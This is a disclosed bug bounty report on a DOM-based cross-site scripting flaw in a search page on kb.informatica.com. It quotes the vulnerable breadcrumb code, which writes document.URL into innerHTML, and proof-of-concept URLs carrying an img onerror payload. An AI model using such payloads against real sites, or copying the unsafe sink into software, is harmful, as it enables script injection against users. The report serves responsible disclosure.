[kb.informatica.com] Dom Based xss

Disclosed: 2019-08-17 09:48:13 By e3xpl0it To informatica
Medium
Vulnerability Details
Hi! I found Dom based xss on this subdomain https://kb.informatica.com javaScript security is very important, even more in portals where users store their personal data. Attackers can target those portals to find and exploit High-risk JavaScript vulnerabilities like Dom based xss vulnerabilities POC ,the vulnerable code javascript on this page https://kb.informatica.com/KBExternal/pages/infasearchltd.aspx? view-source: string 1406 /*google chrome var li = document.createElement("li"); strChild = "<a href="+document.URL+" style='color:#fff !important;font-size:10px'>Search Results</a>"; li.innerHTML = strChild; document.getElementById('DynamicBreadcrumb').appendChild(li); } attack scenario the latest versions of browsers google chrome https://kb.informatica.com/KBExternal/pages/infasearchltd.aspx?#"><img src=x onerror=alert(document.domain)>&infasearch.aspx=hek IE 11 https://kb.informatica.com/KBExternal/pages/infasearchltd.aspx?#"><img src=x onerror=alert(document.domain)>&infasearch.aspx=hek
Actions
View on HackerOne
Report Stats
  • Report ID: 156166
  • State: Closed
  • Substate: resolved
  • Upvotes: 22
Share this report